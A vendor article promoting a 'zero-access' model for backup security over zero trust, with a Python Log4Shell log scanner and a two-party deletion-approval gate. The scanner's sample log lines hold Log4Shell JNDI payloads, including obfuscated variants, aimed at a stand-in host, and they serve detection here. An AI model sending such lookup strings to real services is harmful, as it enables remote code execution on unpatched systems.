Beyond Zero Trust: How to Eliminate Backup Access and Elevate Your Cyber Security

Astute data custodians use zero-trust methods to enhance infrastructure security. This model shifts the security perimeter from traditional network boundaries to individual resources, requiring continuous authentication and authorization for every single access request. However, a fundamental issue remains: the fact that access is granted in the first place. Once authenticated, a user could still do harm, even if by accident.

While zero trust significantly improves security, there is a more robust way to secure the backup environment, and that is not to grant access to it at all. The zero-access concept addresses the limitations of zero trust.

The Current Threat Landscape

Cybersecurity experts have seen a significant surge in cyber activities, primarily focused on obtaining credentials, gaining access, and manipulating or removing data. These activities often culminate in ransomware or other catastrophic attacks, forcing your business to recover and potentially even pay a ransom.

What’s more, the threat landscape has evolved to a point where many attackers are now using AI to make their attacks easier. For instance, AI-generated phishing emails can now mimic trusted figures like CEOs, making the attack more convincing and harder to detect.

Backup operations are particularly attractive targets for these threats. Sophos’ 2024 State of Ransomware report found that in 94% of the ransomware incidents surveyed, the attackers also attempted to compromise the victim’s backups. Some ransomware gangs and variants, LockBit among them, specifically target backup environments. The recent attack on UnitedHealth Group’s Change Healthcare unit, at a company that reports fending off an attempted intrusion every 70 seconds, froze large portions of its IT infrastructure, including backup systems.

While the zero-trust approach is crucial in securing enterprise backup environments, it has limitations. On its own, zero trust is not enough to protect backup against these sophisticated threats.

Things Have Changed

In the past, once users passed initial security checks, they were trusted forever. They could access any resource in the network without ever being verified again. But the modern IT landscape — with its cloud computing, mobile workforces, and distributed systems — has rendered this approach obsolete. We can no longer rely on a single digital or physical barrier for protection. Because attackers can easily compromise user credentials and move laterally within the network, continuous verification is now a must.

Consequently, the access control methods that were effective a decade ago will no longer cut it.

The Concept of Zero Trust — Never Trust. Always Verify.

A zero-trust security model requires authentication for every single access request every time, no matter how many times the credentials have been verified before. The point of this “never trust; always verify” approach is to limit security exposure, minimize the number of attacks, and reduce the impact when they occur. That’s why zero trust belongs in every IT and data protection strategy.

Special Considerations for the Backup Environment

The backup environment poses unique security challenges that make it an ideal candidate for the zero-access approach.

For one thing, backup contains copies of data from all other applications, making it a prime target for cyber attacks.

The backup environment is also incredibly complex. Even small backup environments have numerous components, and in larger organizations and enterprises, the number of software and hardware components and the interactions between them is staggering. Each component typically requires access, creating multiple potential vulnerabilities, even in security-hardened operations that use zero-trust methods like multifactor authentication.

Unfortunately, no organization is immune, as we saw in a recent attack against a large company with well-secured IT operations managed by an experienced provider. Even though the company did all the right things, it still lost its backup catalog, rendering data unrecoverable. This example highlights the difficulty in securing backup, especially since many backup products weren’t designed to fend off cyber attacks.

Why Zero Trust Alone Can’t Secure Backup

Zero trust is crucial for improving cyber protection and is widely recommended for securing infrastructure and data. Everyone should use it wherever applicable. But backup and recovery environments need more security than zero trust can provide. That’s because zero trust has some limitations.

  1. Access is access: While zero trust makes access more difficult, the goal is still to grant access, which can be exploited if credentials are compromised. This is an unacceptable risk for backup systems.
  2. Multiple components = more vulnerability: The numerous components in a backup environment all act as potential attack vectors. Security is often managed separately for each component, thereby increasing the challenge.
  3. Inconsistent vendor adoption: Not all technology vendors fully embrace zero-trust principles in their product design and management. Even backup vendors that offer advanced security features typically can’t extend these protections to all components in a backup environment.
  4. Framework flaws: Legacy code and architectures can contain hidden vulnerabilities that zero-trust controls do not address, because the flaw sits beneath the authentication layer. For example:
  • SSH and OpenSSH, designed as secure replacements for cleartext remote-login protocols such as Telnet and rlogin, are also the management path into many backup servers and appliances. If that service is left reachable with weak, shared or default credentials, or runs an unpatched build, it becomes a back door into the backup product regardless of how the front-end console authenticates users.
  • Log4j, a Java logging library embedded in many products to record events, was the target of Log4Shell (CVE-2021-44228), which lets an attacker achieve remote code execution simply by getting a crafted lookup string written to a log. Finding and patching every copy of the library across all systems remains a challenge, and a zero-trust front door does nothing for a component that evaluates attacker-supplied log data.
  5. Lack of cyber resilience for backup: Originally designed to counter hardware failures and human errors, backup now plays a crucial role in recovering from cyber attacks. To be truly cyber resilient, backup environments need advanced protection that is designed to withstand sophisticated attacks and maintain integrity when other systems are compromised. Zero-trust methods don’t do that.
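To make the Log4Shell point above concrete, here is an added example (written for this page, not code from Cobalt Iron or the Log4j project) of the kind of detection logic a backup operator can run over web-server or appliance logs: it strips the lookup obfuscation commonly seen in Log4Shell payloads and flags the underlying JNDI indicator. The lookup handling is a simplified model of Log4j’s `${...}` syntax that covers only case-mapping and default-value lookups, and the log lines are constructed.

```python
"""Flag Log4Shell (CVE-2021-44228) exploitation attempts in log lines.

Added example. The obfuscation normaliser below is a simplified model of
Log4j's ${...} lookup syntax (case and default-value lookups only), not
Log4j's own resolver. SAMPLE_LOGS is constructed for illustration.
"""
import re
from typing import List

# ${lower:X} / ${upper:X} lookups used to hide the literal "jndi"
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-default} lookups that resolve to their default, e.g. ${env:NOPE:-j}
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The indicator that matters once the obfuscation is gone
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*://",
    re.IGNORECASE,
)


def normalize(text: str, max_rounds: int = 16) -> str:
    """Collapse nested case/default lookups until nothing changes (bounded)."""
    for _ in range(max_rounds):
        new = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan(lines: List[str]) -> List[dict]:
    """Return one finding per line whose normalised form contains a JNDI lookup."""
    findings = []
    for n, line in enumerate(lines, start=1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            findings.append({
                "line": n,
                "scheme": m.group(1).lower(),
                "normalized": norm[m.start():m.start() + 80],
                "raw": line,
            })
    return findings


SAMPLE_LOGS = [  # constructed for this example
    '10.0.0.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Dec/2021:14:02:13 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:14:02:15 +0000] "GET /api/v1/items HTTP/1.1" 404 12 "-" "${${lower:j}ndi:${lower:rmi}://203.0.113.5:1099/x}"',
    '10.0.0.8 - - [10/Dec/2021:14:02:20 +0000] "GET /search?q=${price} HTTP/1.1" 200 40 "-" "curl/8.4.0"',
    '198.51.100.9 - - [10/Dec/2021:14:02:22 +0000] "POST /upload HTTP/1.1" 200 0 "-" "${${env:NOPE:-j}${::-n}di:dns://203.0.113.5/probe}"',
]


def demo() -> List[dict]:
    """Scan the constructed sample; lines 2, 3 and 5 carry obfuscated payloads."""
    return scan(SAMPLE_LOGS)


if __name__ == "__main__":
    for f in demo():
        print(f"line {f['line']}: jndi/{f['scheme']} -> {f['normalized']}")
```

Matching on the literal `${jndi:` alone misses the second and third payloads; the point of the normalisation step is that detection has to run against what the vulnerable library would have evaluated, not against the raw bytes.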

Because of these weaknesses, it’s crucial to implement additional security measures tailored to the unique challenges of backup environments.

Enter the Zero-Access Model

Zero access is an advanced security approach for backup environments that surpasses traditional zero-trust methods. It prioritizes automation over access, significantly reducing the risk of human error and malicious intent in data breaches.

Key Features of Zero Access:

  1. Automation-centric design: Zero access emphasizes automation as the cornerstone of its security strategy. By eliminating unnecessary human interaction with backup components and operations, it enhances security while improving system efficiency and effectiveness.
  2. Comprehensive protection: This approach provides all-encompassing security for the entire backup infrastructure, safeguarding all components — including servers, software, databases, and storage systems — by removing access points for operational activities. In this way, zero access fills security gaps left by traditional zero-trust approaches.
  3. Elimination of manual management: Zero access removes traditional login capabilities from backup components, preventing account takeovers and unauthorized access. Eliminating these component logins removes most of the attack vectors that bad actors typically exploit.

Zero access incorporates a specialized management interface that gives administrators visibility and control over the backup environment without direct access to the infrastructure. It implements robust zero-trust mechanisms, including multifactor authentication, to ensure only authorized personnel can interact with the system.

If there’s ever a legitimate reason to delete a full backup, like when decommissioning a system, the zero-access approach would follow defensible data deletion protocols that require auditable, multifactor approval for any data removal, thereby preventing administrators from unilaterally deleting data. And in rare instances when an admin would need to access backup devices in a true emergency, it would require multiphase security approval from both company admins and the service provider. These stringent processes ensure that even in emergencies, security remains intact.
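The approval flow described above is a policy that can be enforced in code. The following is an added example, not Cobalt Iron’s implementation: a deletion gate that refuses to remove a backup unless MFA-verified approvals exist from two distinct people representing both the customer and the service provider, and that records every decision in a hash-chained audit log. The party names, the 24-hour request window and the in-memory store are assumptions for the example.

```python
"""Two-party, auditable approval gate for backup deletion (added example).

Models the rule in the text: no single administrator can delete a backup;
approval is required from both the customer and the service provider, each
MFA-verified, and every decision is written to a tamper-evident audit log.
REQUIRED_PARTIES, APPROVAL_WINDOW_S and the dict-backed store are assumptions.
"""
import hashlib
import json
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

REQUIRED_PARTIES = frozenset({"customer_admin", "service_provider"})  # assumption
APPROVAL_WINDOW_S = 24 * 3600  # assumption: pending requests expire after a day


@dataclass(frozen=True)
class Approval:
    actor: str          # identity of the approver
    party: str          # organisation they approve on behalf of
    mfa_verified: bool  # this approval was MFA step-up verified
    ts: float


@dataclass
class DeletionRequest:
    backup_id: str
    requested_by: str
    reason: str
    ts: float
    approvals: List[Approval] = field(default_factory=list)


class AuditLog:
    """Append-only log; each entry commits to the previous one via SHA-256."""
    GENESIS = "0" * 64

    def __init__(self) -> None:
        self.entries: List[Dict] = []
        self._last = self.GENESIS

    def append(self, event: Dict) -> str:
        body = json.dumps(event, sort_keys=True)
        digest = hashlib.sha256((self._last + body).encode()).hexdigest()
        self.entries.append({"prev": self._last, "event": event, "hash": digest})
        self._last = digest
        return digest

    def verify(self) -> bool:
        """Recompute the chain; any edited or removed entry breaks it."""
        prev = self.GENESIS
        for e in self.entries:
            body = json.dumps(e["event"], sort_keys=True)
            if e["prev"] != prev or e["hash"] != hashlib.sha256((prev + body).encode()).hexdigest():
                return False
            prev = e["hash"]
        return True


def evaluate(req: DeletionRequest, now: float) -> Tuple[bool, str]:
    """Apply the two-party policy; returns (approved, reason)."""
    if now - req.ts > APPROVAL_WINDOW_S:
        return False, "request expired; raise a new one"
    for a in req.approvals:
        if a.actor == req.requested_by:
            return False, f"{a.actor} cannot approve their own request"
        if not a.mfa_verified:
            return False, f"approval from {a.actor} was not MFA-verified"
        if a.party not in REQUIRED_PARTIES:
            return False, f"{a.actor} approved for unknown party {a.party!r}"
    missing = REQUIRED_PARTIES - {a.party for a in req.approvals}
    if missing:
        return False, "missing approval from: " + ", ".join(sorted(missing))
    if len({a.actor for a in req.approvals}) < len(REQUIRED_PARTIES):
        return False, "approvals must come from distinct people"
    return True, "two-party approval satisfied"


class ZeroAccessDeletionGate:
    """The only path by which a backup is removed; there is no direct storage login."""

    def __init__(self, store: Dict[str, bytes], log: AuditLog) -> None:
        self._store, self._log = store, log

    def request_delete(self, req: DeletionRequest, now: float) -> bool:
        ok, reason = evaluate(req, now)
        self._log.append({
            "backup_id": req.backup_id, "requested_by": req.requested_by,
            "reason": req.reason, "approvers": sorted(a.actor for a in req.approvals),
            "decision": "approved" if ok else "denied", "detail": reason, "ts": now,
        })
        if ok:
            self._store.pop(req.backup_id, None)
        return ok


def demo() -> Tuple[List[bool], List[str], bool]:
    """Three constructed requests: self-approval, one party only, both parties."""
    t0 = 1_700_000_000.0
    store = {"bk-001": b"...", "bk-002": b"...", "bk-003": b"..."}  # constructed
    log = AuditLog()
    gate = ZeroAccessDeletionGate(store, log)
    r1 = DeletionRequest("bk-001", "alice", "decommission", t0,
                         [Approval("alice", "customer_admin", True, t0 + 60)])
    r2 = DeletionRequest("bk-002", "alice", "decommission", t0,
                         [Approval("bob", "customer_admin", True, t0 + 60)])
    r3 = DeletionRequest("bk-003", "alice", "decommission", t0,
                         [Approval("bob", "customer_admin", True, t0 + 60),
                          Approval("carol", "service_provider", True, t0 + 120)])
    decisions = [gate.request_delete(r, t0 + 300) for r in (r1, r2, r3)]
    return decisions, sorted(store), log.verify()
```

Two design points carry the weight here: the gate is the sole code path that touches the store, so there is no administrator login to take over, and the audit chain is verified rather than trusted, so a denied request or a deletion cannot later be quietly erased from the record.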

Zero Access in Action

In a ransomware attack on a global company, hackers used stolen credentials to compromise more than 1,000 systems. Because the company’s backup solution implemented the zero-access approach, its backups were completely protected. The company recovered without engaging with the hackers.

More attacks came weeks later and caused additional damage. The attackers threatened to target the company’s backups, but because the zero-access architecture eliminates the typical vulnerabilities found in backup environments, they gave up. This incident demonstrates the additional protection zero access offers over traditional zero-trust approaches.

Zero access represents a paradigm shift in backup security, offering a robust solution against cyber threats by redesigning how we manage and protect backup environments. By prioritizing automation, comprehensive protection, and stringent access controls, zero access is a new standard for securing critical backup data in an increasingly hostile digital landscape.

About the Author

Robert Marett, Chief Technology Officer, Cobalt Iron. Robert can be reached online at https://www.linkedin.com/in/robmarett/ and at our company website www.cobaltiron.com
